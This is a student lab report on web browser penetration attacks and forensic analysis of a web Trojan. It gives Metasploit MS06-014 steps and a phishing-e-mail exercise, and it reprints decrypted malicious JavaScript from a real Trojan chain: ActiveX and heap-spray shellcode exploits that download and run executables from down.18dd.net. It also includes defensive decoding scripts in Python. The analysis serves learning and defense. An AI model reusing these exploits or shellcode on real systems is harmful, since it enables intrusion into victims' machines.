20212914 Network Attack and Defense Practice, Assignment 11 (Week 13) (2021-2022-2)

1. Practice content

1.1 Practice introduction

(1) Web browser penetration attack

Task: carry out a browser penetration attack experiment with an attacker machine and a Windows target, and experience the actual process of building a web Trojan and attacking a browser.

Experiment steps:

① Select the MS06-014 exploit module in Metasploit

② Choose any remote shell payload

③ Set the server address and URL parameters, run exploit, and generate the malicious web Trojan script

④ Start the browser in the target environment, verify connectivity with the server, and visit the URL of the web Trojan script

⑤ Check the exploit status in Metasploit; after a successful exploit, open the remote control SESSION and execute commands on the target machine

(2) Forensics analysis practice - analysis of a web Trojan attack scenario

Practice process:

① Start from start.html and find the address of new09.htm in this file.

② After entering new09.htm, compute the 32-character MD5 hash (32 hex digits) of each decrypted file address and use the hash value as the file name to download the corresponding file from http://192.168.68.253/scom/hashed/ (note: the letters in the file name are lowercase and there is no extension). That file is the content of the decrypted address.

③ If the decrypted address is a web page or script file, please continue to decrypt.

④ If the decrypted address is a binary program file, please perform static disassembly or dynamic debugging.

⑤ Repeat the above process until all of these files have been analyzed.

(3) Attack and defense confrontation practice - attack and defense of web browser penetration attacks

The attacker uses Metasploit to build exploit code for at least two different web browser vulnerabilities, obfuscates it, assembles it into a URL, and sends it to the defender in a deceptive e-mail.

The defender extracts and de-obfuscates the links in the e-mail, tries to recover the original form of the exploit code, and analyzes which web browser vulnerabilities the code attacks.

1.2 Learning content

Web penetration

Information gathering

First, collect server asset information: which IPs are alive, which ports are open on those IPs, and which services run on those ports.

Weak password detection

Among the services on these open ports, the main ones are system services, database services and web services. Weak-password detection on common port services is essential.

Web application penetration

Through server asset detection, the open web ports of the server can be collected. In an intranet, most web systems expose a login interface that requires user name and password authentication. Taking an intranet system as an example, the actual penetration test is carried out.

System vulnerability detection

Once inside the intranet, some servers can usually be taken over through weak passwords and the web. If not, system vulnerabilities can be tried. When the intranet is poorly patched, remote overflow exploits can be tried (use with caution: they may blue-screen and bring down the system).

Trojan horse attack

How a Trojan horse works

A Trojan horse program invades the user's computer directly and does damage. It is often disguised as a utility program or a game to lure the user into opening an e-mail attachment that carries it or downloading it from the Internet. Once the user opens the attachment or runs the program, it hides a program in the system that executes silently at startup. This remote control tool can completely control the victim host and is very harmful.

A Trojan generally consists of two parts: a client and a server.
The server is installed on the controlled computer. It is usually delivered by e-mail or other means and tricked into running on the user's computer in order to control it.
The client program is used by the controller to control the controlled computer.
The connection between the server program and the client program enables control of the remote computer.
When the Trojan runs, the server program first obtains the highest privileges on the local computer. When the local computer is connected to the network, the client program can establish a connection directly with the server program and send it various basic operation requests; the server program carries out these requests, thus controlling the local computer.

Because a Trojan needs both the server program and the client program to work, the local machine must be infected with the server program. The server program is an executable that can spread directly or hidden inside other executables, but the Trojan itself has no ability to reproduce or infect automatically.

Classification of Trojans

1. Remote access Trojan horse
2. Password sending Trojan horse
3. Keyboard recording Trojan horse
4. Destructive Trojan horse
5. FTP type Trojan horse

2. Practice process

2.1 Web browser penetration attack

Attacker IP: 192.168.75.128
Target IP: 192.168.75.132
Connectivity between the attacker and the target tested fine.

Open Metasploit on Kali with sudo msfconsole:

Run search MS06-014 to find the MS06-014 module, then load it with use exploit/windows/browser/ie_createobject:

set payload windows/shell/bind_tcp selects the payload; show options lists the remaining settings; then run exploit to generate http://192.168.75.128:8080/qoRBo0

http://192.168.75.128:8080/0MUqWiF5
The target uses a browser to access the URL:

At this point the attacker gets a session; enter sessions -i 1 to select session 1 and get a shell:

2.2 Forensics analysis practice - analysis of a web Trojan attack scenario

First, start with the start.html file (copy it and open it in Notepad). Searching for "new09.htm" finds two places:

From these two places we can see that start.html references the new09.htm file, so new09.htm is in the same directory as start.html. Check new09.htm:

<iframe width='0' height='0' src='http://aa.18dd.net/aa/kl.htm'></iframe> 
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1299644.js"></script> 

new09.htm contains a hidden iframe loading http://aa.18dd.net/aa/kl.htm and a script reference to http://js.users.51.la/1299644.js. Compute the MD5 hash of each:

Then look in the hashed folder for these two files, 7f60672dcd6b5e90b6772545ee219bd3 and 23180a42a2ff1192150231b44ffdf3d3, and open each in Notepad:

Obviously the latter file contains nothing of interest. The former is encoded with XXTEA + Base64. The encryption key is hidden in the penultimate line:

t=utf8to16(xxtea_decrypt(base64decode(t), '\x73\x63\x72\x69\x70\x74'));
Decoding the hex escapes \x73\x63\x72\x69\x70\x74 as characters gives the key: script.
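The decryption can also be done offline instead of through a website. The following Python is an added example written for this report, not code from the page or from the JavaScript xxtea library it targets; it assumes the layout used by the common JavaScript xxtea library (little-endian 32-bit words, the byte length appended as the last word, key padded to four words) and verifies itself on a constructed sample. The encrypt function exists only so the example can round-trip that sample.

```python
import base64
import re
import struct

DELTA = 0x9E3779B9          # XXTEA round constant
MASK = 0xFFFFFFFF           # keep everything in 32-bit unsigned arithmetic


def decode_js_hex_escapes(s: str) -> str:
    """Expand JavaScript \\xNN escapes, e.g. '\\x73\\x63\\x72\\x69\\x70\\x74' -> 'script'."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def _to_words(data: bytes, with_length: bool) -> list:
    """Bytes -> little-endian 32-bit words (zero padded); optionally append the byte length."""
    padded = data + b"\x00" * (-len(data) % 4)
    words = list(struct.unpack("<%dI" % (len(padded) // 4), padded))
    if with_length:
        words.append(len(data))
    return words


def _from_words(words: list, with_length: bool) -> bytes:
    raw = struct.pack("<%dI" % len(words), *words)
    if not with_length:
        return raw
    body, n = raw[:-4], words[-1]
    # With the wrong key the trailing length word is garbage: detect that here.
    if n > len(body) or n < len(body) - 3:
        raise ValueError("bad length word: wrong key or corrupt ciphertext")
    return body[:n]


def _key_words(key: bytes) -> list:
    # The JS library pads short keys with zero words and only ever uses the first four.
    return (_to_words(key, False) + [0, 0, 0, 0])[:4]


def _mx(sum_, y, z, p, e, k):
    a = ((z >> 5) ^ ((y << 2) & MASK)) + ((y >> 3) ^ ((z << 4) & MASK))
    b = (sum_ ^ y) + (k[(p & 3) ^ e] ^ z)
    return (a & MASK) ^ (b & MASK)


def xxtea_encrypt(data: bytes, key: bytes) -> bytes:
    """Reference XXTEA encryption; only here so the example can round-trip a sample."""
    if not data:
        return b""
    v, k = _to_words(data, True), _key_words(key)
    n = len(v) - 1
    z, sum_ = v[n], 0
    for _ in range(6 + 52 // (n + 1)):
        sum_ = (sum_ + DELTA) & MASK
        e = (sum_ >> 2) & 3
        for p in range(n):
            y = v[p + 1]
            v[p] = (v[p] + _mx(sum_, y, z, p, e, k)) & MASK
            z = v[p]
        y = v[0]
        v[n] = (v[n] + _mx(sum_, y, z, n, e, k)) & MASK
        z = v[n]
    return _from_words(v, False)


def xxtea_decrypt(data: bytes, key: bytes) -> bytes:
    """XXTEA decryption matching the JS library's xxtea_decrypt(str, key)."""
    if not data:
        return b""
    v, k = _to_words(data, False), _key_words(key)
    n = len(v) - 1
    rounds = 6 + 52 // (n + 1)
    y, sum_ = v[0], (rounds * DELTA) & MASK
    for _ in range(rounds):
        e = (sum_ >> 2) & 3
        for p in range(n, 0, -1):
            z = v[p - 1]
            v[p] = (v[p] - _mx(sum_, y, z, p, e, k)) & MASK
            y = v[p]
        z = v[n]
        v[0] = (v[0] - _mx(sum_, y, z, 0, e, k)) & MASK
        y = v[0]
        sum_ = (sum_ - DELTA) & MASK
    return _from_words(v, True)


def decrypt_web_trojan(b64_text: str, key_escaped: str) -> str:
    """Offline equivalent of utf8to16(xxtea_decrypt(base64decode(t), '\\x73...')) from the page."""
    key = decode_js_hex_escapes(key_escaped).encode("latin-1")
    return xxtea_decrypt(base64.b64decode(b64_text), key).decode("utf-8")


def encrypt_for_demo(plaintext: str, key_escaped: str) -> str:
    """Produce a Base64(XXTEA(plaintext)) sample the way the encoder side would (demo only)."""
    key = decode_js_hex_escapes(key_escaped).encode("latin-1")
    return base64.b64encode(xxtea_encrypt(plaintext.encode("utf-8"), key)).decode("ascii")
```

When the key is wrong, the trailing length word does not validate and decrypt_web_trojan raises ValueError, which is the quickest way to tell a bad key guess from a genuinely different encoding.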

Use this website for XXTEA + Base64 decryption:

Then convert the hex-escaped text in the quotation marks to a plain string, which gives the following:

function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
else{
try{var f;var storm=new ActiveXObject("MPS.StormPlayer");}
catch(f){};
finally{if(f!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}
try{var h;var obj=new ActiveXObject("BaiduBar.Tool");}
catch(h){};
finally{if(h!="[object Error]"){
obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}
}}}

The application vulnerabilities exploited by this file are in "Adodb.Stream", "MPS.StormPlayer", "POWERPLAYER.PowerPlayerCtrl.1" and "BaiduBar.Tool", i.e. Microsoft's database access object (ADODB), Storm Player, PPStream and Baidu Soba. All of these are very widely used. In addition, the file references three JS files and a compressed package (bd.cab, which unpacks to bd.exe). Next, compute the MD5 values of "http://aa.18dd.net/aa/1.js", "http://aa.18dd.net/aa/b.js", "http://aa.18dd.net/aa/pps.js" and "http://down.18dd.net/bb/bd.cab":

file                              MD5 value
http://aa.18dd.net/aa/1.js        5d7e9058a857aa2abee820d5473c5fa4
http://aa.18dd.net/aa/b.js        3870c28cc279d457746b3796a262f166
http://aa.18dd.net/aa/pps.js      5f0b8bf0385314dbe0e5ec95e6abedc2
http://down.18dd.net/bb/bd.cab    1c1d7b3539a617517c49eee4120783b2
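Steps ② to ⑤ of the forensics procedure (hash every referenced address, fetch the file named by the hash, keep decoding while the result is a page or script) amount to a worklist. The Python below is an added example for this report, not code from the page; the hashed/ base URL is the one given in the practice description, the sample input is the two references from new09.htm quoted above, and the src/href and http(s) patterns are my own choice of what counts as a reference.

```python
import hashlib
import re

HASHED_BASE = "http://192.168.68.253/scom/hashed/"   # from the practice description

# Constructed sample: the two references found in new09.htm on this page.
NEW09_HTM = (
    "<iframe width='0' height='0' src='http://aa.18dd.net/aa/kl.htm'></iframe>\n"
    '<script language="javascript" type="text/javascript" '
    'src="http://js.users.51.la/1299644.js"></script>\n'
)

_REF = re.compile(r"""(?:src|href)\s*=\s*["']([^"']+)["']""", re.I)   # markup attributes
_URL = re.compile(r"https?://[^\s'\"<>]+")                           # bare URLs in scripts


def extract_references(content: str) -> list:
    """URLs a page or script pulls in, in order of first appearance, without duplicates."""
    seen, refs = set(), []
    for url in _REF.findall(content) + _URL.findall(content):
        if url not in seen:
            seen.add(url)
            refs.append(url)
    return refs


def hashed_name(url: str) -> str:
    """File name in the hashed/ directory: lowercase 32-hex-digit MD5 of the URL, no extension."""
    return hashlib.md5(url.encode("utf-8")).hexdigest()


def needs_further_decoding(url: str) -> bool:
    """Step ③: pages and scripts are decoded again; binaries (step ④) go to disassembly."""
    return url.lower().rsplit("?", 1)[0].endswith((".htm", ".html", ".js"))


def build_worklist(content: str) -> list:
    """One entry per referenced address: what to fetch and what to do with it next."""
    worklist = []
    for url in extract_references(content):
        name = hashed_name(url)
        worklist.append({
            "url": url,
            "file": name,
            "fetch": HASHED_BASE + name,
            "decode_further": needs_further_decoding(url),
        })
    return worklist


if __name__ == "__main__":
    for item in build_worklist(NEW09_HTM):
        print(item["file"], "<-", item["url"], "(decode again)" if item["decode_further"] else "(binary)")
```

Each decoded file is fed back through build_worklist until nothing new appears, which is exactly the loop in step ⑤.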

Open the corresponding files in sequence:

1. http://aa.18dd.net/aa/1.js (5d7e9058a857aa2abee820d5473c5fa4)

Opening the corresponding file shows that it is hex-encoded data:

After decoding, we get:

var url="http://down.18dd.net/bb/014.exe";
try{var xml=ado.CreateObject("Microsoft.XMLHTTP","");xml.Open("GET",url,0);xml.Send();
as.type=1;as.open();as.write(xml.responseBody);path="..\\ntuser.com";as.savetofile(path,2);as.close();
var shell=ado.createobject("Shell.Application","");shell.ShellExecute("cmd.exe","/c "+path,"","open",0)}catch(e){}

The first part of the code downloads http://down.18dd.net/bb/014.exe; the rest continues to abuse the ADODB.Stream vulnerability to save and run it.

2. http://aa.18dd.net/aa/b.js (3870c28cc279d457746b3796a262f166)

This file uses the "packed" JavaScript obfuscation, which can be decoded on the website. The decoded result is:

var bigblock=unescape("%u9090%u9090");
var headersize=20;
var shellcode=unescape("%uf3e9%u0000"+"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c"+"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378"+"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b"+"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef"+"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1"+"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103"+"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904"+"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b"+"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e"+"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d"+"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320"+"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344"+"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc"+"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0"+"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab"+"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f"+"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574"+"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e"+"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00"+"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c"+"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54"+"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");
var slackspace=headersize+shellcode.length;
while(bigblock.length<slackspace)bigblock+=bigblock;
fillblock=bigblock.substring(0,slackspace);
block=bigblock.substring(0,bigblock.length-slackspace);
while(block.length+slackspace<0x40000)block=block+block+fillblock;
memory=new Array();
for(x=0;x<300;x++)
  memory[x]=block+shellcode;
var buffer='';
while(buffer.length<4068)buffer+="\x0a\x0a\x0a\x0a";
storm.rawParse(buffer)

We can see the keyword shellcode. According to the reference material, the shellcode is a downloader, so we need to find the URL it fetches. Decoding the shellcode yields http://down.18dd.net/bb/bf.exe, another executable.

3. http://aa.18dd.net/aa/pps.js (5f0b8bf0385314dbe0e5ec95e6abedc2)

Octal escaping is used here; the decoded result is:

/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u*/
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u62
2f%u2f62%u7070%u2e73%u7865%u0065");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="\x0a\x0a\x0a\x0a";
pps.Logo = buffer

Decoding in the same way as before, we get the executable file http://down.18dd.net/bb/pps.exe
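Both b.js and pps.js hide their download URL inside a %u-encoded shellcode string, and the analyst's job is to get that URL (and the imported API names that confirm it is a downloader) without executing anything. The Python below is an added example written for this report, not code from the page; it reproduces what JavaScript's unescape() puts in memory (each %uXXXX becomes one 16-bit code unit, stored little-endian) and runs a strings-style scan over the result. The sample inputs are the trailing data portions of the two shellcodes quoted above (API names and URL only; the executable stub is left out), and the list of "downloader" API names is my own.

```python
import re

# Sample inputs: the string tails of the %u-encoded shellcodes recovered from b.js and pps.js.
B_JS_TAIL = (
    "%u0ce8%uffff%u47ff%u7465%u7250%u636f"
    "%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574"
    "%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e"
    "%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00"
    "%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c"
    "%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54"
    "%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465"
    "%u622f%u2f62%u6662%u652e%u6578%u0000"
)
PPS_JS_TAIL = (
    "%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465"
    "%u622f%u2f62%u7070%u2e73%u7865%u0065"
)

# Imports that, taken together, mark a classic download-and-execute stub (analyst's own list).
KNOWN_DOWNLOADER_APIS = {
    "LoadLibraryA", "GetProcAddress", "GetSystemDirectoryA",
    "URLDownloadToFileA", "WinExec", "ExitThread",
}

_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def join_js_fragments(src: str) -> str:
    """Collect the pieces of an unescape("..."+"..."+...) expression into one escape string."""
    return "".join(re.findall(r'"([^"]*)"', src))


def js_unescape_to_bytes(escaped: str) -> bytes:
    """Mirror the in-memory form: %uXXXX -> two bytes little-endian, %XX -> one byte."""
    out = bytearray()
    pos = 0
    for m in _ESCAPE.finditer(escaped):
        out += escaped[pos:m.start()].encode("latin-1")   # literal characters between escapes
        if m.group(1) is not None:
            unit = int(m.group(1), 16)
            out += bytes((unit & 0xFF, unit >> 8))
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    out += escaped[pos:].encode("latin-1")
    return bytes(out)


def printable_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII at least min_len long, like the strings(1) utility."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def analyse_shellcode(escaped: str) -> dict:
    """Decode a %u-encoded blob and pull out the URLs and known API names it carries."""
    strings = printable_strings(js_unescape_to_bytes(escaped))
    return {
        "strings": strings,
        "urls": [s for s in strings if s.lower().startswith(("http://", "https://"))],
        "apis": [s for s in strings if s in KNOWN_DOWNLOADER_APIS],
    }


if __name__ == "__main__":
    for name, blob in (("b.js", B_JS_TAIL), ("pps.js", PPS_JS_TAIL)):
        result = analyse_shellcode(blob)
        print(name, "urls:", result["urls"], "apis:", result["apis"])
```

Seeing URLDownloadToFileA and WinExec next to the URL is what justifies calling the stub a downloader; the same decoder works on the full unescape(...) expression after join_js_fragments strips the quotes and plus signs.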

4. http://down.18dd.net/bb/bd.cab (1c1d7b3539a617517c49eee4120783b2)

This is a compressed file. Decompress it to get a file called bd.exe.

Checking the executable with the Super Patrol (超级巡警) tool for packing shows that it is written in Delphi:

Disassemble the bf.exe file with W32Dasm and view the list of string references:

From the above, we can infer the following:
From the strings "goto try", "try", "Alletdel.bat", "cmd /c date", "cmd /c date 1981-01-12", "del", "del %0" and others, this program probably generates a batch file called "Alletdel.bat". The file has a label called "try", and the batch file keeps executing the command on the line after this label. The commands probably check whether a file exists, change the system date, and delete some files.

From ":\AutoRun.inf", "[AutoRun] open=", "AutoRun.inf" and "shell\Auto\command=", it is speculated that the program generates an autorun file in the root directory of the disk so that the user starts the program unintentionally.

"Rising Kaka Internet Security Assistant - IE leak proof wall", "allow" and "allow to execute" show that this program has some ability to get past system protection software.

There are 20 strings of the form "http://down.18dd.net/kl/**.exe", so this program downloads a batch of Trojans.

2.3 Attack and defense confrontation practice - attack and defense of web browser penetration attacks

The attacker uses Metasploit to build exploit code for at least two different web browser vulnerabilities, obfuscates it, assembles it into a URL, and sends it to the defender in a deceptive e-mail.

The defender extracts and de-obfuscates the links in the e-mail, tries to recover the original form of the exploit code, and analyzes which web browser vulnerabilities the code attacks.

Attacker

Following the steps of the first experiment, generate a URL using the MS06-014 vulnerability: http://192.168.75.128:8080/zHzUqjOqB7

Then disguise the URL in an e-mail and send it to the defender:

Defender

After receiving the e-mail, the defender opens its source and sees that large numbers of spaces, tabs, carriage returns and so on are inserted in the middle, so that the key instructions are split into spliced strings to keep anti-virus software from recognizing them:

Using the website, the complete code is obtained as follows. Reading it, we can see that document.location loads the payload, and an executable file follows on the next line. I guess that this executable is downloaded to the target through the web page, with the attacker acting as the server:
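The whitespace padding and string splicing described above can be undone offline as well. The Python below is an added example for this report, not the page's code and not the actual page Metasploit produced: it works on a constructed sample in the same style (tokens broken up with tabs and newlines, the URL spliced from pieces, the URL itself taken from this section), normalizes whitespace outside string literals, folds adjacent literals back together, and then reports the indicators the defender is looking for. The indicator list is my own.

```python
import re

# Constructed sample in the style described above (not the real Metasploit output).
SAMPLE_HTML = '''<html><body>
<script>
var p = "http://" +\t"192.168.75.128" +
        ":8080/" + "zHzUqjOqB7";
document\t.\r\n location = p ;
</script>
</body></html>'''

# Split text into alternating code / string-literal pieces so literals stay untouched.
# Limitation: an unmatched quote in surrounding HTML text would throw the pairing off.
_LITERAL = re.compile(r'("[^"\n]*"|\'[^\'\n]*\')')


def normalize_code(src: str) -> str:
    """Collapse whitespace outside string literals and drop it around punctuation."""
    parts = _LITERAL.split(src)
    for i in range(0, len(parts), 2):            # even indices are code, odd are literals
        code = re.sub(r"\s+", " ", parts[i])
        code = re.sub(r" ?([.=+;,(){}<>]) ?", r"\1", code)
        parts[i] = code
    return "".join(parts)


def merge_spliced_strings(src: str) -> str:
    """Fold "a"+"b"+"c" into "abc"; repeat until nothing changes."""
    pat = re.compile(r'"([^"\n]*)"\+"([^"\n]*)"')
    prev = None
    while prev != src:
        prev, src = src, pat.sub(r'"\1\2"', src)
    return src


def deobfuscate(src: str) -> str:
    return merge_spliced_strings(normalize_code(src))


# Constructs worth flagging in a page that arrived by e-mail (analyst's own list).
INDICATORS = ("document.location", "document.write", "ActiveXObject", "unescape(")


def find_indicators(src: str) -> dict:
    """De-obfuscate, then list which indicators appear and which URLs are loaded."""
    clean = deobfuscate(src)
    return {
        "indicators": [i for i in INDICATORS if i in clean],
        "urls": re.findall(r'"(https?://[^"]+)"', clean),
    }


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_HTML))
    print(find_indicators(SAMPLE_HTML))
```

On the sample, the spliced pieces collapse back to the single URL and document.location is the only indicator, which is the reading reached above by hand.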

Open the task manager on the target to view the running processes; the executable file can be found:

3. Problems encountered in learning and solutions

  • Problem 1: the attack in Experiment 1 was unsuccessful
  • Solution to problem 1: switch the payload to windows/shell/bind_tcp (set payload windows/shell/bind_tcp); the attack then succeeds.

4. Practice summary

In this experiment I learned how to carry out web browser penetration attacks, how to analyze web Trojans and collect evidence, and another way of using Metasploit.

Posted by wellmoon on Mon, 30 May 2022 10:29:51 +0530